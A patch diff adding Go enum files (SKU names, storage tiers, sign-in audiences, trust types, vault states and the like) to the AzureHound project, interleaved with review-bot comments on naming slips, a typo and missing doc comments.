+ ResourceBehaviorWelcomeEmailDisabled ResourceBehavior = "WelcomeEmailDisabled"
+)
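Review bot: In the post-processed block of enums/relationship.go, `RelationshipAZAZResetPassword Relationship = "AZAZResetPassword"` doubles the `AZ` prefix that every other constant in the file carries once, which looks like a search-and-replace slip; the comment `// relationshiperated relationships` above the first block looks like the same slip (presumably `// Enumerated relationships`). If whatever consumes this output matches relationship names exactly, the doubled string would never match and password-reset paths could silently drop out of the resulting graph, so the value should be confirmed against the consumer's list of relationship names. Proposed: `RelationshipAZResetPassword Relationship = "AZResetPassword"`. Other files in this patch may already reference the current identifier, so the rename needs a matching update there.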
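Review bot: The comment on `ResourceBehaviorAllowOnlyMembersToPost` in enums/resourcebehavior.go reads `// If unset ny user in the organization can post conversations to the group.`; `ny` should be `any`. The type comment would also be picked up properly by Go doc tooling if it started with the identifier and ended with a period, e.g. `// ResourceBehavior specifies group behaviors for a Microsoft 365 group.`.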
diff --git a/enums/resourceprovisioning.go b/enums/resourceprovisioning.go
new file mode 100644
index 0000000..dbb1dff
--- /dev/null
+++ b/enums/resourceprovisioning.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Specifies group resources to be provisioned as part of the Microsoft 365 group.
+type ResourceProvisioning string
+
+const (
+ // Provision this group as a team in Microsoft Teams.
+ // Additionally, this value can also be added on group update through a PATCH operation, in order to provision a
+ // team from an existing Microsoft 365 group.
+ ResourceProvisioningTeams ResourceProvisioning = "Teams"
+)
diff --git a/enums/routing_choice.go b/enums/routing_choice.go
new file mode 100644
index 0000000..1d3fcd5
--- /dev/null
+++ b/enums/routing_choice.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type RoutingChoice string
+
+const (
+ InternetRouting RoutingChoice = "InternetRouting"
+ MicrosoftRouting RoutingChoice = "MicrosoftRouting"
+)
diff --git a/enums/ruleprocessingstate.go b/enums/ruleprocessingstate.go
new file mode 100644
index 0000000..6a000b7
--- /dev/null
+++ b/enums/ruleprocessingstate.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type RuleProcessingState string
+
+const (
+ RuleProcessingStateOn RuleProcessingState = "On"
+ RuleProcessingStatePaused RuleProcessingState = "Paused"
+)
diff --git a/enums/scm_type.go b/enums/scm_type.go
new file mode 100644
index 0000000..511b337
--- /dev/null
+++ b/enums/scm_type.go
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ScmType string
+
+const (
+ BitbucketGitScm ScmType = "BitbucketGit"
+ BitbucketHgScm ScmType = "BitbucketHg"
+ CodePlexGitScm ScmType = "CodePlexGit"
+ CodePlexHgScm ScmType = "CodePlexHg"
+ DropboxScm ScmType = "Dropbox"
+ ExternalGitScm ScmType = "ExternalGit"
+ ExternalHgScm ScmType = "ExternalHg"
+ GitHubScm ScmType = "GitHub"
+ LocalGitScm ScmType = "LocalGit"
+ NoneScm ScmType = "None"
+ OneDriveScm ScmType = "OneDrive"
+ TfsScm ScmType = "Tfs"
+ VSOScm ScmType = "VSO"
+ VSTSRMScm ScmType = "VSTSRM"
+)
diff --git a/enums/serviceprincipaltype.go b/enums/serviceprincipaltype.go
new file mode 100644
index 0000000..dff6e80
--- /dev/null
+++ b/enums/serviceprincipaltype.go
@@ -0,0 +1,42 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ServicePrincipalType string
+
+const (
+ // A service principal that represents an application or service.
+ // The appId property identifies the associated app registration, and matches the appId of an application, possibly
+ // from a different tenant. If the associated app registration is missing, tokens are not issued for the service
+ // principal.
+ ServicePrincipalTypeApplication ServicePrincipalType = "Application"
+
+ // A service principal that represents a managed identity. Service principals representing managed identities can be
+ // granted access and permissions, but cannot be updated or modified directly.
+ ServicePrincipalTypeManagedIdentities ServicePrincipalType = "ManagedIdentities"
+
+ // A service principal that represents an app created before app registrations, or through legacy experiences.
+ // Legacy service principal can have credentials, service principal names, reply URLs, and other properties which
+ // are editable by an authorized user, but does not have an associated app registration. The appId value does not
+ // associate the service principal with an app registration. The service principal can only be used in the tenant
+ // where it was created.
+ ServicePrincipalTypeLegacy ServicePrincipalType = "Legacy"
+
+ // For internal use.
+ ServicePrincipalTypeSocialIDP ServicePrincipalType = "SocialIdp"
+)
diff --git a/enums/share_permissions.go b/enums/share_permissions.go
new file mode 100644
index 0000000..40a3eb4
--- /dev/null
+++ b/enums/share_permissions.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type DefaultSharePermission string
+
+const (
+ NoPermission DefaultSharePermission = "None"
+ ShareContributor DefaultSharePermission = "StorageFileDataSmbShareContributor"
+ ShareElevatedContributor DefaultSharePermission = "StorageFileDataSmbShareElevatedContributor"
+ ShareReader DefaultSharePermission = "StorageFileDataSmbShareReader"
+)
diff --git a/enums/signinaudience.go b/enums/signinaudience.go
new file mode 100644
index 0000000..de9ef50
--- /dev/null
+++ b/enums/signinaudience.go
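Review bot: In enums/serviceprincipaltype.go, `ServicePrincipalTypeManagedIdentities ServicePrincipalType = "ManagedIdentities"` uses a plural value while its own comment describes a single managed identity; as far as I know Microsoft Graph reports this type as `ManagedIdentity`, so the string should be checked against a real API response. If it is wrong, any comparison against this constant never matches and managed-identity service principals end up unclassified, which matters when the output is used to reason about which identities can act on which resources. Suggested: `ServicePrincipalTypeManagedIdentity ServicePrincipalType = "ManagedIdentity"`, keeping the old identifier as a deprecated alias if other files in this patch already reference it.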
@@ -0,0 +1,35 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Specifies the Microsoft accounts that are supported for the current application.
+type SigninAudience string
+
+const (
+ // Users with a Microsoft work or school account in my organization’s Azure AD tenant (single-tenant).
+ SigninAudienceMyOrg SigninAudience = "AzureADMyOrg"
+
+ // Users with a Microsoft work or school account in any organization’s Azure AD tenant (multi-tenant).
+ SigninAudienceMultiOrg SigninAudience = "AzureADMultipleOrgs"
+
+ // Users with a personal Microsoft account, or a work or school account in any organization’s Azure AD tenant.
+ SigninAudienceMultiOrgAndAccount SigninAudience = "AzureADandPersonalMicrosoftAccount"
+
+ // Users with a personal Microsoft account only.
+ SigninAudienceAccount SigninAudience = "PersonalMicrosoftAccount"
+)
diff --git a/enums/signintype.go b/enums/signintype.go
new file mode 100644
index 0000000..51d59af
--- /dev/null
+++ b/enums/signintype.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SigninType string
+
+const (
+ SigninTypeEmail SigninType = "emailAddress"
+ SigninTypeUserName SigninType = "userName"
+ SigninTypeFederated SigninType = "federated"
+ SigninTypeUserPrincipalName SigninType = "userPrincipalName"
+)
diff --git a/enums/site_availability_state.go b/enums/site_availability_state.go
new file mode 100644
index 0000000..fe5b054
--- /dev/null
+++ b/enums/site_availability_state.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SiteAvailabilityState string
+
+const (
+ DisasterRecoveryModeAvailabilityState SiteAvailabilityState = "DisasterRecoveryMode"
+ LimitedAvailabilityState SiteAvailabilityState = "Limited"
+ NormalAvailabilityState SiteAvailabilityState = "Normal"
+)
diff --git a/enums/site_load_balancing.go b/enums/site_load_balancing.go
new file mode 100644
index 0000000..bf36e4a
--- /dev/null
+++ b/enums/site_load_balancing.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SiteLoadBalancing string
+
+const (
+ LeastRequestsLoadBalancing SiteLoadBalancing = "LeastRequests"
+ LeastResponseTimeLoadBalancing SiteLoadBalancing = "LeastResponseTime"
+ PerSiteRoundRobinLoadBalancing SiteLoadBalancing = "PerSiteRoundRobin"
+ RequestHashLoadBalancing SiteLoadBalancing = "RequestHash"
+ WeightedRoundRobinLoadBalancing SiteLoadBalancing = "WeightedRoundRobin"
+ WeightedTotalTrafficLoadBalancing SiteLoadBalancing = "WeightedTotalTraffic"
+)
diff --git a/enums/sku_converstion_status.go b/enums/sku_converstion_status.go
new file mode 100644
index 0000000..a984746
--- /dev/null
+++ b/enums/sku_converstion_status.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SkuConversionStatus string
+
+const (
+ FailedConversionStatus SkuConversionStatus = "Failed"
+ InProgressConversionStatus SkuConversionStatus = "InProgress"
+ SucceededConversionStatus SkuConversionStatus = "Succeeded"
+)
diff --git a/enums/sku_name.go b/enums/sku_name.go
new file mode 100644
index 0000000..b8eb124
--- /dev/null
+++ b/enums/sku_name.go
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SkuName string
+
+const (
+ SKU_Premium_LRS SkuName = "Premium_LRS"
+ SKU_Premium_ZRS SkuName = "Premium_ZRS"
+ SKU_Standard_GRS SkuName = "Standard_GRS"
+ SKU_Standard_GZRS SkuName = "Standard_GZRS"
+ SKU_Standard_LRS SkuName = "Standard_LRS"
+ SKU_Standard_RAGRS SkuName = "Standard_RAGRS"
+ SKU_Standard_RAGZRS SkuName = "Standard_RAGZRS"
+ SKU_Standard_ZRS SkuName = "Standard_ZRS"
+ SKU_Basic SkuName = "Basic"
+ SKU_Free SkuName = "Free"
+ SKU_NotSpecified SkuName = "NotSpecified"
+ SKU_Premium SkuName = "Premium"
+ SKU_Shared SkuName = "Shared"
+ SKU_Standard SkuName = "Standard"
+)
diff --git a/enums/spendinglimit.go b/enums/spendinglimit.go
new file mode 100644
index 0000000..7052e65
--- /dev/null
+++ b/enums/spendinglimit.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SpendingLimit string
+
+const (
+ SpendingLimitCurrentPeriodOff SpendingLimit = "CurrentPeriodOff"
+ SpendingLimitOff SpendingLimit = "Off"
+ SpendingLimitOn SpendingLimit = "On"
+)
diff --git a/enums/ssl_state.go b/enums/ssl_state.go
new file mode 100644
index 0000000..129eb44
--- /dev/null
+++ b/enums/ssl_state.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SslState string
+
+const (
+ DisabledSslState SslState = "Disabled"
+ IpBasedEnabledSslState SslState = "IpBasedEnabled"
+ SniEnabledSslState SslState = "SniEnabled"
+)
diff --git a/enums/ssomode.go b/enums/ssomode.go
new file mode 100644
index 0000000..f908563
--- /dev/null
+++ b/enums/ssomode.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SSOMode string
+
+const (
+ SSOModePassword SSOMode = "password"
+ SSOModeSaml SSOMode = "saml"
+ SSOModeNotSupported SSOMode = "notSupported"
+ SSOModeOIDC SSOMode = "oidc"
+)
diff --git a/enums/statuslevel.go b/enums/statuslevel.go
new file mode 100644
index 0000000..2bc84fa
--- /dev/null
+++ b/enums/statuslevel.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type StatusLevel string
+
+const (
+ StatusLevelError StatusLevel = "Error"
+ StatusLevelInfo StatusLevel = "Info"
+ StatusLevelWarning StatusLevel = "Warning"
+)
diff --git a/enums/storage_account_access_tier.go b/enums/storage_account_access_tier.go
new file mode 100644
index 0000000..d6ddc3e
--- /dev/null
+++ b/enums/storage_account_access_tier.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type StorageAccountAccessTier string
+
+const (
+ CoolAccessTier StorageAccountAccessTier = "Cool"
+ HotAccessTier StorageAccountAccessTier = "Hot"
+ PremiumAccessTier StorageAccountAccessTier = "Premium"
+)
diff --git a/enums/storage_account_provisioning_state.go b/enums/storage_account_provisioning_state.go
new file mode 100644
index 0000000..a1c7e8a
--- /dev/null
+++ b/enums/storage_account_provisioning_state.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ProvisioningState string
+
+const (
+ CreatingState ProvisioningState = "Creating"
+ ResolvingDNSState ProvisioningState = "ResolvingDNS"
+ SucceededState ProvisioningState = "Succeeded"
+)
diff --git a/enums/storage_account_status.go b/enums/storage_account_status.go
new file mode 100644
index 0000000..b951976
--- /dev/null
+++ b/enums/storage_account_status.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AccountStatus string
+
+const (
+ AvailableStatus AccountStatus = "available"
+ UnavailableStatus AccountStatus = "unavailable"
+)
diff --git a/enums/storage_container_public_access.go b/enums/storage_container_public_access.go
new file mode 100644
index 0000000..47c9523
--- /dev/null
+++ b/enums/storage_container_public_access.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type PublicAccess string
+
+const (
+ BlobPublicAccess PublicAccess = "Blob"
+ ContainerPublicAccess PublicAccess = "Container"
+ NoPublicAccess PublicAccess = "None"
+)
diff --git a/enums/storagetype.go b/enums/storagetype.go
new file mode 100644
index 0000000..a1754cb
--- /dev/null
+++ b/enums/storagetype.go
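Review bot: `PublicAccess` and its constants in enums/storage_container_public_access.go have no doc comments, although this is the field a reader checks to tell whether container data is readable without authentication. I would add `// PublicAccess is the anonymous read level configured on a storage container.` above the type, and mark the constants with `// blobs are readable anonymously`, `// container listing and blobs are readable anonymously` and `// no anonymous access`. The unprefixed names here, and `ProvisioningState` / `AccountStatus` in the neighbouring storage-account files, are also generic for a shared `enums` package where the vault equivalent is spelled `VaultProvisioningState`; a `StorageContainer`/`StorageAccount` prefix would keep later additions from colliding.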
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type StorageType string
+
+const (
+ StorageTypePremium_LRS StorageType = "Premium_LRS"
+ StorageTypePremium_ZRS StorageType = "Premium_ZRS"
+ StorageTypeStandardSSD_LRS StorageType = "StandardSSD_LRS"
+ StorageTypeStandardSSD_ZRS StorageType = "StandardSSD_ZRS"
+ StorageTypeStandard_LRS StorageType = "Standard_LRS"
+ StorageTypeUltraSSD_LRS StorageType = "UltraSSD_LRS"
+)
diff --git a/enums/subscriptionstate.go b/enums/subscriptionstate.go
new file mode 100644
index 0000000..c23a17e
--- /dev/null
+++ b/enums/subscriptionstate.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type SubscriptionState string
+
+const (
+ SubscriptionStateDeleted SubscriptionState = "Deleted"
+ SubscriptionStateDisabled SubscriptionState = "Disabled"
+ SubscriptionStateEnabled SubscriptionState = "Enabled"
+ SubscriptionStatePastDue SubscriptionState = "PastDue"
+ SubscriptionStateWarned SubscriptionState = "Warned"
+)
diff --git a/enums/tenantcategory.go b/enums/tenantcategory.go
new file mode 100644
index 0000000..aae66f8
--- /dev/null
+++ b/enums/tenantcategory.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Category of the tenant.
+type TenantCategory string
+
+const (
+ TenantCategoryHome TenantCategory = "Home"
+ TenantCategoryManagedBy TenantCategory = "ManagedBy"
+ TenantCategoryProjectedBy TenantCategory = "ProjectedBy"
+)
diff --git a/enums/trusttype.go b/enums/trusttype.go
new file mode 100644
index 0000000..d9bffe0
--- /dev/null
+++ b/enums/trusttype.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Type of trust for the joined device.
+type TrustType string
+
+const (
+ // Indicates BYO personal device
+ TrustTypeWorkplace TrustType = "Workplace"
+
+ // Cloud only joined devices
+ TrustTypeAzureAD TrustType = "AzureAd"
+
+ // On-premises domain joined devices joined to Azure AD
+ TrustTypeServerAD TrustType = "ServerAd"
+)
diff --git a/enums/usage_state.go b/enums/usage_state.go
new file mode 100644
index 0000000..9d501af
--- /dev/null
+++ b/enums/usage_state.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type UsageState string
+
+const (
+ ExceededUsageState UsageState = "Exceeded"
+ NormalUsageState UsageState = "Normal"
+)
diff --git a/enums/vaultprovisioningstate.go b/enums/vaultprovisioningstate.go
new file mode 100644
index 0000000..2243e91
--- /dev/null
+++ b/enums/vaultprovisioningstate.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Provisioning state of the vault.
+type VaultProvisioningState string
+
+const (
+ VaultProvisioningStateRegisteringDns VaultProvisioningState = "RegisteringDns"
+ VaultProvisioningStateSucceeded VaultProvisioningState = "Succeeded"
+)
diff --git a/enums/vaultsku.go b/enums/vaultsku.go
new file mode 100644
index 0000000..4d6d4fc
--- /dev/null
+++ b/enums/vaultsku.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
